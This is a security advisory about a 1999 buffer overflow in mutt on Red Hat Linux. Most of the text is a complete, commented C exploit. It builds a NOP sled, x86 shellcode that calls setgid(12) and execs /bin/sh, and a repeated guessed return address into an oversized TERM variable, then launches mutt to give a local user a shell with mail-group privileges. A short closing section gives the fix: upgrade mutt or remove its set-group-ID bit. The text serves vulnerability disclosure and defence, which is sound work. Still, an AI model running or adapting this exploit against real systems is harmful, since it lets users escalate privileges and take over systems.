COMMAND

    mutt

SYSTEMS AFFECTED

    Linux

PROBLEM

    Taeho Oh posted a mutt buffer overflow exploit.  The overflow is
    triggered through an oversized TERM environment variable: the payload
    below builds a NOP sled, shellcode and a guessed return address into
    TERM and then execs mutt, and the shellcode calls setgid(12) and
    execs /bin/sh.  With it a local user can gain a shell with mail group
    privileges.  It was tested on Red Hat 5.0 with mutt 0.88.  Exploit
    follows:

    /*
    
	    Mutt exploit code for x86 linux
    
	    Local user can gain mail group access.
    
	    Tested redhat linux : 5.0
	    Tested mutt : 0.88
    
	    This program is for demonstration purposes only.
	    USE IT AT YOUR OWN RISK!
    
	    Programmed by Taeho Oh 1999/04/25
    
    Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara
    PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus
    PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug
    
    */
    
    #define _POSIX_C_SOURCE 200809L   /* setenv()/execl() prototypes under strict -std=c11 */
    #include <errno.h>
    #include <stdint.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    
    /* Subtracted from get_sp() in main(); negative, so the return-address
       guess is sp + 500.  argv[1], if given, is added to it. */
    #define OFFSET                         -500
    /* Presumably the distance into the overflowed buffer at which mutt's
       saved return address sits (not confirmed here); together with RANGE
       and a NUL it sizes the payload: RET_POSITION + RANGE + 1 bytes. */
    #define RET_POSITION                    234
    /* Slack: the last RANGE*2 bytes of the payload hold only copies of the
       guessed return address, so a slightly wrong RET_POSITION still hits. */
    #define RANGE                            20
    /* x86 one-byte NOP, used for the sled in front of the shellcode. */
    #define NOP                            0x90
    /* Unused: the shellcode carries its own "/bin/sh" string. */
    #define COMMAND                        "/bin/sh"
    
    /*
     * i386 Linux payload (55 bytes, no 0x00 byte, so it survives being passed
     * through the environment as a C string):
     *
     *   setgid(12);                     -- gid 12, presumably the "mail" group on
     *                                      the tested Red Hat 5.0 system
     *   execve("/bin/sh", argv, envp);  -- argv = {"/bin/sh", NULL}, envp = {NULL},
     *                                      both built in place just past the string
     *   exit(0);
     *
     * The jmp/call pair is the usual trick for locating the trailing "/bin/sh"
     * without knowing where the payload was loaded: the call pushes the address
     * of the byte after it (the string) and popl %esi retrieves it.  The stores
     * to 0x7(%esi), 0x8(%esi) and 0xc(%esi) land past the end of these bytes,
     * in whatever follows the payload in the overflowed buffer (the repeated
     * return address), which is why the string needs no NUL of its own here.
     */
    char shellcode[]=
	    "\xeb\x29"                      /* jmp  +0x29  -> the call below       */
	    "\x31\xc0"                      /* xorl %eax,%eax   (call target)      */
	    "\x31\xdb"                      /* xorl %ebx,%ebx                      */
	    "\xb3\x0c"                      /* movb $0xc,%bl    gid = 12           */
	    "\xb0\x2e"                      /* movb $0x2e,%al   46 = setgid        */
	    "\xcd\x80"                      /* int  $0x80       setgid(12)         */
	    "\x5e"                          /* popl %esi        esi = &"/bin/sh"   */
	    "\x89\x76\x08"                  /* movl %esi,0x8(%esi)  argv[0]        */
	    "\x31\xc0"                      /* xorl %eax,%eax                      */
	    "\x88\x46\x07"                  /* movb %al,0x7(%esi)   NUL after "sh" */
	    "\x89\x46\x0c"                  /* movl %eax,0xc(%esi)  argv[1] = NULL */
	    "\xb0\x0b"                      /* movb $0xb,%al    11 = execve        */
	    "\x89\xf3"                      /* movl %esi,%ebx   path               */
	    "\x8d\x4e\x08"                  /* leal 0x8(%esi),%ecx  argv           */
	    "\x8d\x56\x0c"                  /* leal 0xc(%esi),%edx  envp ({NULL})  */
	    "\xcd\x80"                      /* int  $0x80       execve(...)        */
	    "\x31\xdb"                      /* xorl %ebx,%ebx   status = 0         */
	    "\x89\xd8"                      /* movl %ebx,%eax                      */
	    "\x40"                          /* inc  %eax        1 = exit           */
	    "\xcd\x80"                      /* int  $0x80       exit(0)            */
	    "\xe8\xd2\xff\xff\xff"          /* call -0x2e  (rel32 0xffffffd2, back to
	                                       xorl %eax,%eax; the old comment's -0x24
	                                       did not match the encoded bytes)     */
	    "/bin/sh";                      /* .string "/bin/sh", NUL added at run time */
    
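    /*
     * Return the current stack pointer; main() uses it as the base for the
     * return-address guess stamped into the TERM payload.
     *
     * The original loaded %esp into %eax and fell off the end of the function
     * without a return statement, which is undefined behaviour in C and only
     * worked because of the i386 calling convention at -O0.  This version names
     * the asm output operand and returns it, and has a fallback for targets
     * without an inline-asm port.  The value is the callee's stack pointer, a
     * few words below the caller's frame; the exploit's OFFSET/RANGE slack
     * absorbs that difference, as it did before.
     */
    unsigned long get_sp(void)
    {
	    unsigned long sp;
    #if defined(__i386__)
	    __asm__ __volatile__ ("movl %%esp, %0" : "=r" (sp));
    #elif defined(__x86_64__)
	    __asm__ __volatile__ ("movq %%rsp, %0" : "=r" (sp));
    #else
	    /* No inline-asm port for this target: the address of a local is a
	       close stand-in for the stack pointer. */
	    sp = (unsigned long)&sp;
    #endif
	    return sp;
    }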
    
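    /*
     * Build the oversized TERM value and exec mutt with it.
     *
     * Payload layout in buff (BSIZE = RET_POSITION + RANGE + 1 bytes):
     *   [0, nop_len)                        NOP sled
     *   [nop_len - 1, nop_len - 1 + len)    shellcode (starts one byte early,
     *                                       overwriting the last NOP, as before)
     *   [.., BSIZE - 1)                     guessed return address, repeated in
     *                                       4-byte slots
     *   [BSIZE - 1]                         NUL terminator for setenv()
     *
     * argv[1], if present, is a decimal adjustment added to OFFSET to tune the
     * return-address guess.  Returns EXIT_FAILURE if that argument is malformed,
     * the shellcode does not fit, setenv() fails or the exec fails; on success
     * the process image is replaced by mutt and nothing is returned.
     *
     * Fixes over the original: int main (C11 requires it); strtol with error
     * checking instead of atoi; the address-stamping loop no longer writes one
     * byte past buff (255 bytes, but the old loop's last iteration wrote bytes
     * 252..255) and no longer stores through a possibly misaligned long*; the
     * execl() terminator is cast to (char *) as the varargs contract requires;
     * a failed exec or setenv is reported instead of silently falling off the
     * end of a void main; and a NUL byte in the guessed address (which would
     * truncate the environment string) is reported.
     *
     * Target is i386 Linux: the saved return address is 4 bytes and the
     * shellcode uses the int 0x80 ABI.  A 64-bit build constructs the same
     * bytes but cannot hit anything.
     */
    int main(int argc, char **argv)
    {
	    enum { BSIZE = RET_POSITION + RANGE + 1 };
	    char buff[BSIZE];
	    size_t sc_len = strlen(shellcode);
	    size_t nop_len;
	    size_t i;
	    long adj = 0;
	    unsigned long guess;
	    uint32_t ret;

	    printf("Taeho Oh ( ohhara@postech.edu )                   http://postech.edu/~ohhara\n");
	    printf("PLUS ( Postech Laboratory for Unix Security )        http://postech.edu/plus\n");
	    printf("PosLUG ( Postech Linux User Group )          http://postech.edu/group/poslug\n\n");

	    if (argc > 1) {
		    char *end;

		    errno = 0;
		    adj = strtol(argv[1], &end, 10);
		    if (end == argv[1] || *end != '\0' || errno == ERANGE) {
			    fprintf(stderr, "usage: %s [offset-adjustment]\n", argv[0]);
			    return EXIT_FAILURE;
		    }
	    }

	    /* Guess where the NOP sled lands on mutt's stack: our own stack pointer
	       minus OFFSET (i.e. plus 500), nudged by argv[1].  Unsigned arithmetic
	       so the negative OFFSET wraps exactly as the original's sp - offset did. */
	    guess = get_sp() - (unsigned long)OFFSET - (unsigned long)adj;
	    ret = (uint32_t)guess;

	    /* A zero byte inside the address would end the TERM string early and
	       the payload would never reach mutt intact. */
	    for (i = 0; i < sizeof ret; i++) {
		    if (((ret >> (8 * i)) & 0xffu) == 0) {
			    fprintf(stderr, "warning: guessed address 0x%08lx contains a NUL byte; "
			                    "adjust the offset\n", (unsigned long)ret);
			    break;
		    }
	    }

	    /* nop_len must be >= 1 because the shellcode is copied to nop_len - 1. */
	    if (sc_len + RANGE * 2 >= (size_t)BSIZE) {
		    fprintf(stderr, "shellcode (%zu bytes) does not fit the %d-byte payload\n",
		            sc_len, (int)BSIZE);
		    return EXIT_FAILURE;
	    }
	    nop_len = (size_t)BSIZE - RANGE * 2 - sc_len;

	    /* Stamp the guess over the whole buffer in 4-byte slots, plus the
	       partial last slot, without stepping past buff[BSIZE - 1]. */
	    for (i = 0; i + sizeof ret <= (size_t)BSIZE; i += sizeof ret)
		    memcpy(buff + i, &ret, sizeof ret);
	    if (i < (size_t)BSIZE)
		    memcpy(buff + i, &ret, (size_t)BSIZE - i);

	    memset(buff, NOP, nop_len);
	    memcpy(buff + nop_len - 1, shellcode, sc_len);
	    buff[BSIZE - 1] = '\0';

	    if (setenv("TERM", buff, 1) != 0) {
		    perror("setenv");
		    return EXIT_FAILURE;
	    }
	    execl("/usr/bin/mutt", "mutt", (char *)NULL);
	    perror("execl: /usr/bin/mutt");   /* reached only if the exec failed */
	    return EXIT_FAILURE;
    }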

SOLUTION

    Newer versions of mutt fix the overflow; upgrade.  Until the upgrade is
    in place, removing the set-group-ID bit from the mutt binary prevents
    the overflow from yielding mail group privileges (the bug itself remains,
    but a local user then gains nothing beyond their own access).